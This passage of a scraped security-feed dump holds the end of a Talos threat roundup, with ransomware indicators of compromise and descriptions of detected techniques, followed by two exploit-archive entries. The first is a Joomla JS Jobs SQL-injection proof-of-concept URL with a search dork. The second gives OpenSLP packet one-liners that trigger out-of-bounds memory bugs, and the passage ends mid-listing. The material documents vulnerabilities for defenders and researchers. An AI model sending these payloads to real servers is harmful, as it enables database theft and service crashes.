5 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\n` | 5 
\n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\@` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\L` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\U` | 5 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\n` | 5 \n`\\RECYCLER\\S-1-5-18\\$ad714f5b8798518b3ccb73fd900fd2ba\\@` | 3 \n`\\RECYCLER\\S-1-5-18\\$ad714f5b8798518b3ccb73fd900fd2ba\\n` | 3 \n`\\RECYCLER\\S-1-5-21-1258710499-2222286471-4214075941-500\\$ad714f5b8798518b3ccb73fd900fd2ba\\@` | 3 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0698b0699a2832438d3d40b9b254a1db6997650030a4f1baa9d83b195ddcefee 2a4480ab660655f0667496d06a8a6c4ca40795ea673a1d8be36c185fcd5843a2 2ff6a5a8fb138d625121b218c791129fdac013f6cea1fc4cac9a8f986a43a17e 61fe63c712ac33630cca861ad8bc3283d9e591a61184cf0c2e40e1712880e858 68073e04dff2910046705b41823a3d2e22de0b80722b2e0642f8bbad2251f31b 6c0cfbb2a0f755be5e73f9eebf0af5a66a8a9ccd9f064742275c45911aa4ba05 73efae80e8a1433ecce908d9d89a7e0dee9689f9e41a43858b7dd020ad98bdbb 81af3ef292ab1ca88658434c67ba4433727b2fa52c6170689cc7e6987d52e994 82c17d05d449adc7970c6d923a00567228d2f92d784e17e46fd40fb5f75fc96c 852ca255c72851fff39129f7e4ad946e28c1c3adfe73f099d034b511d0d4f0ab 8bed5fd8ee4415d50e0fcfa15697455737ec30e371b9cf59998f16b9df82d655 8ff205742a2e987be8743877e3832f704a3d8a428adeaa809a62a2da3d98284f 90971a6f3936154d1d42143075a74343307211738f60fd8dc2704b9b1092b9eb 91b52463d52c11f45b8bc6e833560f374b3c23943ef83a596de4c9c263e25601 945e8db2a3e172c1b4def44a627f31ec3d92027c2302ae6ca8426995a0d2f330 97ab941d4e212453c834739eecc62dc6b23a2737b7e99fdfd5e5bc2b1e677070 97b0052c9b458793345d76e6a445608f464eb17c15a4a3e1ac62ecc2b5e19c70 9abab9e192eba949efed12bf34d82b796b872954a8928695c6c2eb539d7a9994 
9b57296d2b3a6e2d71d279e2f72a0c5764076e60db0decd1c933cea1ec68abbd 9be01433e0553992428c321e8ddb794697837e4266ebfcde8957190f175300d0 9bef202996bca3127c622f5b26c98bbe35ae6ef0aeea22f071517a4545c5daac 9c0d8b542bc6d349355dc8bff3d9f3436ec63033777b6ae2b7350b82a31f0b64 9c73a69c0eec3b51b0ede9d6ffdb4079c8f8ecab122dace2625d32f5a81794b1 9f6076a9aeff4a57d098390ff61e60b6a954ee545b8945fca5d39f4907de0e84 a0c2956a0dd44d0e177af551a6b3c0990a6d163f2d8e36a1b4370c667bf7bdd2 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-pB5aFhwb7bE/XbxfE89Fl2I/AAAAAAAAC4s/MbaVn96IVYg87L3yZWyxIEzW_J9dqck_QCLcBGAsYHQ/s1600/852ca255c72851fff39129f7e4ad946e28c1c3adfe73f099d034b511d0d4f0ab_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Shade-7357624-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xi ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Client Server Runtime Subsystem ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xVersion ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32 ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: shst ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: sh1 ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: shsnt ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xstate ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xcnt ` | 11 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\DEBUG \nValue Name: 
ExceptionRecord ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xmode ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xpk ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\HOMEGROUP\\UISTATUSCACHE \nValue Name: OnlyMember ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: CleanShutdown ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} \nValue Name: Data ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{6DD1DC5F-5840-11E6-B80E-00501E3AE7B5} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Data ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA63-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Data ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963} \nValue Name: Generation ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APPLETS\\SYSTRAY \nValue Name: Services ` | 6 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\NLASVC\\PARAMETERS\\INTERNET\\MANUALPROXIES ` | 6 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\CD BURNING\\DRIVES\\VOLUME{509D0DCA-5840-11E6-A51E-806E6F6E6963} \nValue Name: Drive Type ` | 6 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`76[.]73[.]17[.]194` | 5 \n`131[.]188[.]40[.]189` | 5 \n`208[.]83[.]223[.]34` | 4 \n`171[.]25[.]193[.]9` | 4 \n`86[.]59[.]21[.]38` | 3 \n`193[.]23[.]244[.]244` | 3 \n`194[.]109[.]206[.]212` | 3 \n`154[.]35[.]32[.]5` | 3 \n`128[.]31[.]0[.]39` | 3 \n`83[.]142[.]225[.]126` | 1 \n`137[.]74[.]19[.]202` | 1 \n`195[.]154[.]237[.]147` | 1 \n`81[.]17[.]17[.]131` | 1 \n`198[.]16[.]70[.]10` | 1 \n`5[.]9[.]116[.]66` | 1 \n`62[.]151[.]180[.]62` | 1 \n`193[.]105[.]73[.]80` | 1 \n`176[.]31[.]103[.]150` | 1 \n`194[.]59[.]207[.]195` | 1 \n`146[.]185[.]189[.]197` | 1 \n`144[.]76[.]143[.]137` | 1 \n`87[.]193[.]208[.]14` | 1 \n`98[.]128[.]172[.]233` | 1 \n`87[.]121[.]98[.]43` | 1 \n`141[.]157[.]13[.]229` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\README1.txt` | 12 \n`\\README10.txt` | 12 \n`\\README2.txt` | 12 \n`\\README3.txt` | 12 \n`\\README4.txt` | 12 \n`\\README5.txt` | 12 \n`\\README6.txt` | 12 \n`\\README7.txt` | 12 \n`\\README8.txt` | 12 \n`\\README9.txt` | 12 \n`%ProgramData%\\System32\\xfs` | 11 \n \n#### File Hashes\n\n` 26da7d57ec1798ddcdc4f016f4eb0752a6e1ecd5481091dc523ea01175093d8d 2a68d908566be84208cdb2f8f7d91e333690f9caee7e3f2e910483612c5a5046 5d7a85f85865277795519e6e7b5f656cf9904ed6dcdbb6d901482c47594cea7b 68daf44d57a4d13701eb66b637a00cc6931fb913515a7c95dec3a318c0365968 6f387364a1ebaebef7dc40f5bc1bf8200206b140e27050ff3f41fe6fb46c6b7f 7699113e80abe023018877fd18e3b39a29b26a21cd7dfcef06cbe9c0f9595cff 9714f035f6458b4496dd0e1362eded1eca6214ee35768b1e2f615124671b52e3 985418b9d311ec5b3f386204c2f65342856b90c5617fcbb1bf50bf1ae13ec3f1 b7005d089d4e060ea4528dbca67236924bb2310c0b214d3f74e0961effda7da4 b9bd26c9291c769620dd003b63619c10b741495bbef133d488dc877634cda0bc d48ef74859fc77868492c43758d01f618c2af1d007e570d3848fe1d5a246e10c deaa2c5a65617ca09fd4d84a268febc8ecdd660307a5fe576bbd10833d045de1 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | 
N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-UCq2LBdJiG4/XbxhYZ7RguI/AAAAAAAAC44/JS8SudPVLcgtFwDOqZDqex713wrb-3gPwCLcBGAsYHQ/s1600/68daf44d57a4d13701eb66b637a00cc6931fb913515a7c95dec3a318c0365968_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (57939) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nAtom Bombing code injection technique detected \\- (2838) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Procedure Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. 
\nKovter injection detected \\- (410) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nExcessively long PowerShell command detected \\- (354) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nProcess hollowing detected \\- (313) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (137) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (95) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. 
Adware is known to sometimes download and install malware. \nDealply adware detected \\- (93) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nPowerShell file-less infection detected \\- (46) \nA PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families. \nFusion adware detected \\- (29) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware. \n \n", "modified": "2019-11-01T10:31:45", "published": "2019-11-01T10:31:45", "id": "TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/bUEZpje_8WQ/threat-roundup-1025-1101.html", "type": "talosblog", "title": "Threat Roundup for October 25 to November 1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-12-04T07:46:53", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-08-12T00:00:00", "published": "2019-08-12T00:00:00", "id": "1337DAY-ID-33105", "href": "https://0day.today/exploit/description/33105", "title": "Joomla JS Jobs Component (com_jsjobs) 1.2.5 - cities.php SQL Injection Vulnerability", "type": "zdt", "sourceData": "#Exploit Title: Joomla! 
component com_jsjobs - SQL Injection\r\n#Dork: inurl:\"index.php?option=com_jsjobs\"\r\n#Exploit Author: qw3rTyTy\r\n#Vendor Homepage: https://www.joomsky.com/\r\n#Software Link: https://www.joomsky.com/5/download/1\r\n#Version: 1.2.5\r\n#Tested on: Debian/nginx/joomla 3.9.0\r\n#####################################\r\n#Vulnerability details:\r\n#####################################\r\nVulnerable code is in line 296 in file site/models/cities.php: only $countryid is\r\nvalidated (is_numeric, line 292), while $cityname is lowercased and concatenated\r\ninto the query without escaping or parameter binding. Note that $stateid is\r\nalso concatenated unescaped on line 299 after only a numeric comparison.\r\n\r\n 291\t function isCityExist($countryid, $stateid, $cityname){\r\n 292\t if (!is_numeric($countryid))\r\n 293\t return false;\r\n 294\t\r\n 295\t $db = $this->getDBO();\r\n 296\t\t$query = \"SELECT id,name,latitude,longitude FROM `#__js_job_cities` WHERE countryid=\" . $countryid . \" AND LOWER(name) = '\" . strtolower($cityname) . \"'\";\t//!!!\r\n 297\t\r\n 298\t if($stateid > 0){\r\n 299\t $query .= \" AND stateid=\".$stateid;\r\n 300\t }else{\r\n 301\t $query .= \" AND (stateid=0 OR stateid IS NULL)\";\r\n 302\t\t}\r\n 303\t\t\r\n 305\t $db->setQuery($query);\r\n 306\t $city = $db->loadObject();\r\n 307\t if ($city != null)\r\n 308\t return $city;\r\n 309\t else\r\n 310\t return false;\r\n 311\t }\r\n 312\t\r\n 313\t}\r\n\r\n#####################################\r\n#PoC:\r\n#####################################\r\nhttp://localhost/index.php?option=com_jsjobs&task=cities.savecity&citydata=%27%20UNION%20SELECT%20*%20FROM%20(SELECT%20user())%20AS%20a%20JOIN%20(SELECT%20version())%20as%20b%20JOIN%20(SELECT%20database())%20as%20c%20JOIN%20(SELECT%20%27woot%27)%20as%20d--%20,Canada\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33105"}, {"lastseen": "2018-11-12T06:53:07", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2018-11-09T00:00:00", "published": "2018-11-09T00:00:00", "id": "1337DAY-ID-31559", "href": "https://0day.today/exploit/description/31559", "title": "OpenSLP 2.0.0 - 
Multiple Vulnerabilities", "type": "zdt", "sourceData": "OpenSLP 2.0.0 - Multiple Vulnerabilities\r\n\r\n==========================\r\n \r\nI discovered some bugs in openslp-2.0.0 back in January, 2018. \r\nOne of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free),\r\nand today I'm disclosing two more.\r\n \r\n \r\nBUG 1\r\n=====\r\n \r\nThis issue is an OOB read that does not crash the application.\r\nSo in terms of exploitation it is not very interesting. If that's what\r\nyou're here for then scroll down to bug#2.\r\nAfter the occurrence of the bug the application actually detects the error\r\nand ignores the malicious packet. Therefore, it could be argued that this\r\nis not a bug at all, although reading past the end of a heap allocation is\r\nundefined behaviour and the missing length check is still worth fixing.\r\nNevertheless, here it is:\r\n \r\nProof of concept exploit:\r\n \r\n echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d > /dev/udp/127.0.0.1/427\r\n \r\nValgrind report:\r\n \r\n ==27968== Invalid read of size 1\r\n ==27968== at 0x412436: GetUINT16 (slp_message.c:63)\r\n ==27968== by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327)\r\n ==27968== by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005)\r\n ==27968== by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393)\r\n ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)\r\n ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)\r\n ==27968== by 0x40256B: main (slpd_main.c:699)\r\n ==27968== Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd\r\n ==27968== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n ==27968== by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67)\r\n ==27968== by 0x40FCBA: SLPBufferDup (slp_buffer.c:139)\r\n ==27968== by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383)\r\n ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)\r\n ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)\r\n ==27968== by 0x40256B: main (slpd_main.c:699)\r\n \r\nAnalysis:\r\n \r\nv2ParseSrvReg is responsible for parsing incoming requests. 
Various bytes\r\nare read from the packet and interpreted as integers used as length fields.\r\nOne of them is the scopelistlen, parsed on line 321, and further used as\r\nargument for the amount of bytes to increment the buffer->curpos pointer\r\nin the the GetStrPtr function, shown below on line 112. It now points to\r\nuninitialized memory.\r\n \r\nThe OOB read occurs in GetUINT16, called on line 327 where the buffer->curpos \r\npointer is dereferenced.\r\n \r\nSubsequently the comparison on line 329 evaluates to true since the\r\nbuffer->curpos now points to memory located after the buffer->end\r\npointer. The application therefore stops processing the malicious packet.\r\n \r\n 291 static int v2ParseSrvReg(SLPBuffer buffer, SLPSrvReg * srvreg)\r\n 292 {\r\n 293 int result;\r\n 294\r\n 295 /* 0 1 2 3\r\n 296 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\r\n 297 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 298 | <URL-Entry> \\\r\n 299 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 300 | length of service type string | <service-type> \\\r\n 301 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 302 | length of <scope-list> | <scope-list> \\\r\n 303 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 304 | length of attr-list string | <attr-list> \\\r\n 305 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 306 |# of AttrAuths |(if present) Attribute Authentication Blocks...\\\r\n 307 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */\r\n 308\r\n 309 /* Parse the <URL-Entry>. */\r\n 310 result = v2ParseUrlEntry(buffer, &srvreg->urlentry);\r\n 311 if (result != 0)\r\n 312 return result;\r\n 313\r\n 314 /* Parse the <service-type> string. 
*/\r\n 315 srvreg->srvtypelen = GetUINT16(&buffer->curpos);\r\n 316 srvreg->srvtype = GetStrPtr(&buffer->curpos, srvreg->srvtypelen);\r\n 317 if (buffer->curpos > buffer->end)\r\n 318 return SLP_ERROR_PARSE_ERROR;\r\n 319\r\n 320 /* Parse the <scope-list> string. */\r\n 321 srvreg->scopelistlen = GetUINT16(&buffer->curpos);\r\n 322 srvreg->scopelist = GetStrPtr(&buffer->curpos, srvreg->scopelistlen);\r\n 323 if (buffer->curpos > buffer->end)\r\n 324 return SLP_ERROR_PARSE_ERROR;\r\n 325\r\n 326 /* Parse the <attr-list> string. */\r\n 327 srvreg->attrlistlen = GetUINT16(&buffer->curpos);\r\n 328 srvreg->attrlist = GetStrPtr(&buffer->curpos, srvreg->attrlistlen);\r\n 329 if (buffer->curpos > buffer->end)\r\n 330 return SLP_ERROR_PARSE_ERROR;\r\n \r\n 54 /** Extract a 16-bit big-endian buffer value into a native 16-bit word.\r\n 55 *\r\n 56 * @param[in,out] cpp - The address of a pointer from which to extract.\r\n 57 *\r\n 58 * @return A 16-bit unsigned value in native format; the buffer pointer\r\n 59 * is moved ahead by 2 bytes on return.\r\n 60 */\r\n 61 uint16_t GetUINT16(uint8_t ** cpp)\r\n 62 {\r\n 63 uint16_t rv = AS_UINT16(*cpp);\r\n 64 *cpp += 2;\r\n 65 return rv;\r\n 66 }\r\n ...\r\n 96 /** Extract a string buffer address into a character pointer.\r\n 97 *\r\n 98 * Note that this routine doesn't actually copy the string. 
It only casts\r\n 99 * the buffer pointer to a character pointer and moves the value at @p cpp\r\n 100 * ahead by @p len bytes.\r\n 101 *\r\n 102 * @param[in,out] cpp - The address of a pointer from which to extract.\r\n 103 * @param[in] len - The length of the string to extract.\r\n 104 *\r\n 105 * @return A pointer to the first character at the address pointed to by\r\n 106 * @p cppstring pointer; the buffer pointer is moved ahead by @p len bytes\r\n 107 * on return.\r\n 108 */\r\n 109 char * GetStrPtr(uint8_t ** cpp, size_t len)\r\n 110 {\r\n 111 char * sp = (char *)*cpp;\r\n 112 *cpp += len;\r\n 113 return sp;\r\n 114 }\r\n \r\n \r\nProof of discovery: \r\n \r\n $ echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d | sha256sum\r\n 0d3f7a6e45a59def9097db4f103f95e4af2560bdb25853f9ee1c2e758c7d4946 -\r\n \r\ntwitter.com/magnusstubman/status/953909628622069760\r\n \r\n \r\nPatch:\r\n \r\nI'm not aware of any patch, and I'm not sure the maintainers are going to patch it.\r\n \r\nBUG 2\r\n=====\r\n \r\nFirst and foremost, I'm not claiming credit for this bug since it was\r\napparently discovered by Reno Robert and publicly disclosed on the\r\noss-security mailing list on 2016-09-27 and awarded CVE-2016-7567\r\nthe day after.\r\n \r\nopenwall.com/lists/oss-security/2016/09/27/4\r\nopenwall.com/lists/oss-security/2016/09/28/1\r\n \r\nAnyhow, I wasn't aware of the issue and found it by fuzzing, so I\r\nreported it to the maintainers who made me aware of the earlier discovery.\r\nWhat puzzled me was that no announcement had been made and the fact that\r\nthe latest stable version on their website is still vulnerable! I found it\r\n2017-12-06 and reported it 2018-01-18. See further down for proof of\r\ndiscovery.\r\n \r\nI havn't been able to find any exploit for this bug anywhere. 
Therefore,\r\nI'm today disclosing a proof-of-concept exploit for the bug to increase\r\nattention on the issue.\r\n \r\nExploit:\r\n \r\n echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d > /dev/udp/127.0.0.1/427\r\n \r\nValgrind report:\r\n \r\n ==56913== Invalid write of size 1\r\n ==56913== at 0x4C2D6A3: [email\u00a0protected]_2.2.5 (vg_replace_strmem.c:914)\r\n ==56913== by 0x40FD0B: SLPFoldWhiteSpace (slp_compare.c:210)\r\n ==56913== by 0x4100DC: SLPCompareString (slp_compare.c:374)\r\n ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)\r\n ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)\r\n ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)\r\n ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)\r\n ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)\r\n ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)\r\n ==56913== by 0x402383: main (slpd_main.c:699)\r\n ==56913== Address 0x5b5dd06 is 0 bytes after a block of size 6 alloc'd\r\n ==56913== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n ==56913== by 0x415C51: _xmemdup (slp_xmalloc.c:356)\r\n ==56913== by 0x410096: SLPCompareString (slp_compare.c:365)\r\n ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)\r\n ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)\r\n ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)\r\n ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)\r\n ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)\r\n ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)\r\n ==56913== by 0x402383: main (slpd_main.c:699)\r\n \r\nThe while loop on line 207 fails to perform bounds checking, 
and as such\r\nmay end up incrementing the pointer p up to a point such that p is bigger\r\nthan ep. Thus, the third argument to memmove on line 2010 becomes negative.\r\nHowever, since memmove accepts a size_t (which is unsigned) the value wraps\r\naround and becomes UINT_MAX or close to UINT_MAX resulting in memmove\r\nattempting to move an excessive amount of memory, resulting in OOB write.\r\n \r\n 184 /** fold internal white space within a string.\r\n 185 *\r\n 186 * folds all internal white space to a single space character within a\r\n 187 * specified string. modified the @p str parameter with the result and\r\n 188 * returns the new length of the string.\r\n 189 *\r\n 190 * @param[in] len - the length in bytes of @p str.\r\n 191 * @param[in,out] str - the string from which extraneous white space\r\n 192 * should be removed.\r\n 193 *\r\n 194 * @return the new (shorter) length of @p str.\r\n 195 *\r\n 196 * @note this routine assumes that leading and trailing white space have\r\n 197 * already been removed from @p str.\r\n 198 */\r\n 199 static int slpfoldwhitespace(size_t len, char * str)\r\n 200 {\r\n 201 char * p = str, * ep = str + len;\r\n 202 while (p < ep)\r\n 203 {\r\n 204 if (isspace(*p))\r\n 205 {\r\n 206 char * ws2p = ++p; /* point ws2p to the second ws char. */\r\n 207 while (isspace(*p)) /* scan till we hit a non-ws char. */\r\n 208 p++;\r\n 209 len -= p - ws2p; /* reduce the length by extra ws. */\r\n 210 memmove(ws2p, p, ep - p); /* overwrite the extra white space. 
